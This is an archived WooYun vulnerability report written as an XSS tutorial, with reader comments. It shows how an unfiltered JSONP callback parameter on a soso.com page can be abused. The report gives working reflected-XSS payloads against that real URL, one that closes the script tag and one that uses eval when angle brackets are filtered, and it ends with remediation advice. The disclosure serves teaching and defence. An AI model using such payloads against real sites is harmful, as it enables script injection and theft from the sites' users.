当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-015959

漏洞标题:[腾讯实例教程] 那些年我们一起学XSS - 2. 输出在<script></script>之间的情况

相关厂商:腾讯

漏洞作者: 心伤的瘦子

提交时间:2012-12-13 14:49

修复时间:2013-01-27 14:50

公开时间:2013-01-27 14:50

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-12-13: 细节已通知厂商并且等待厂商处理中
2012-12-13: 厂商已经确认,细节仅向厂商公开
2012-12-23: 细节向核心白帽子及相关领域专家公开
2013-01-02: 细节向普通白帽子公开
2013-01-12: 细节向实习白帽子公开
2013-01-27: 细节向公众公开

简要描述:

接着上面一个教程,我们继续。这个例子属于第一例的特殊情况,当然也有特殊解法。也属于非常常见的一种情况。

详细说明:

1. 我们找到这么一个点,也是输入和输出都未过滤的一个点。相比教程第一例,其特殊之处在于,是输出在了 <script>[输出]</script>之间。

http://activity.soso.com/common/setParentsInfo.php?callback=aaaaaaaaa


如下图:callback参数未做过滤。 在【查看源代码】下,我们可以看到。

5.jpg


缺陷网页源代码:

<script type='text/javascript'>document.domain='soso.com';_ret={"_res":2};try{parent.aaa(_ret);}catch(err){aaa(_ret);}</script>


2. 碰到这种情况,我们一般有以下解法。
2.1 首先判断,是否过滤了 < , > , / 等符号,
2.2 如果都没有过滤,恭喜你,一般可以直接XSS了。代码如下:
http://activity.soso.com/common/setParentsInfo.php?callback=aaaaaaaaa</script><script>alert(1)</script>
原理入下图:

6.jpg


构造callback参数后的源代码

<script type='text/javascript'>document.domain='soso.com';_ret={"_res":2};try{parent.aaaaaaaaa</script><script>alert(1)</script>(_ret);}catch(err){aaaaaaaaa</script><script>alert(1)</script>(_ret);}</script>


2.3 如果过滤了 <, >,那么就无法使用上面的办法了。我们接着看 3
3. script代码里的构造。
友情提示:这里可能需要一点点 javascript 的知识才行哦~~
我们可以如下构造:

http://activity.soso.com/common/setParentsInfo.php?callback=eval('alert(1)');void


可以看到,源代码是下面的样子。

7.jpg


也就是说,我们插入的内容,使得这一段javascript依然【语法正确】,能够【正确执行】,并且能够执行【我们所插入的JS代码】,这样我们的目的就达到了。
构造后的源代码如下:

<script type='text/javascript'>document.domain='soso.com';_ret={"_res":2};try{parent.eval('alert(1)');void(_ret);}catch(err){eval('alert(1)');void(_ret);}</script>


4. 这种输出在JS代码里的情况十分常见,但是呢?不幸的是,像这样没过滤的情况,却不是很常见。例如:
var a="[输出]"; // 通常程序员会把 " 过滤掉, 这样的话,一般来说,我们就很难构造。
但是,这并不是说,就一定是不能利用,后面我们会拿腾讯一些【比较有意思】的例子,来进一步说到 这个【输出在js里】的情况的~

漏洞证明:

见详情。

修复方案:

这类XSS的模型通常是:
<script>...[输出]...</script>
<style>...[输出]...</script>
解决方案:
1. 过滤 </xxx> 组合
2. 针对输出在不同的场景,进行合适的过滤。

版权声明:转载请注明来源 心伤的瘦子@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2012-12-13 16:03

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无

漏洞评价:

评论

  1. 2012-12-13 14:55 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    腾讯是要齐吧

  2. 2012-12-13 14:58 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    靠!这也太假了~~心伤的胖子—心伤的瘦子,这货减肥了。。

  3. 2012-12-13 15:05 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

    支持套装教程,到时好给乌云(@xsser)出书用或者出杂志用。@xsser 你说呢?

  4. 2012-12-13 15:21 | Rookie ( 普通白帽子 | Rank:288 漏洞数:78 | 123)

    减肥成功了 估计要连载 不管你们信不信 反正我信了

  5. 2012-12-13 15:23 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @Rookie 看这架势指定要连载,这厮肯定在计划着情人节礼物。。(TX打包送妹纸)

  6. 2012-12-13 15:39 | dyun ( 普通白帽子 | Rank:102 漏洞数:15 | [code][/code])

    @@~~~~

  7. 2012-12-13 15:46 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    这瘦子要拿这个月的大奖啊?

  8. 2012-12-13 16:39 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    @xsser 洞主叫我问奥迪还是ipad

  9. 2012-12-13 16:59 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

    @冷静 是爱帕的or爱疯or百度U盘

  10. 2013-01-09 19:17 | 小石头 ( 路人 | Rank:8 漏洞数:2 | 行千里路,读万卷书,布衣亦可傲王侯。)

    我擦 这个系列牛逼 出书提前预定啊

  11. 2014-03-28 08:53 | waldens ( 路人 | Rank:0 漏洞数:1 | 小菜鸟一枚)

    太牛了!!!

  12. 2014-05-19 19:35 | j2ck3r ( 普通白帽子 | Rank:406 漏洞数:92 | 别关注我,跟你不熟。)

    如果过滤<>怎么绕过

  13. 2014-07-28 09:09 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    貌似有个标签写错了,可以让管理给改下。修复方案:这类XSS的模型通常是:<script>...[输出]...</script><style>...[输出]...</script>

  14. 2015-03-29 11:39 | llkoio ( 路人 | Rank:20 漏洞数:3 | 热爱网络安全!)

    好文。

  15. 2015-05-27 23:28 | hope ( 路人 | Rank:1 漏洞数:2 | 一个小菜)

    值得学习!!!

  16. 2015-08-21 16:16 | Azox佐熙 ( 路人 | Rank:1 漏洞数:1 | 我就混个脸熟)

    腾讯小洞收了都不修。@腾讯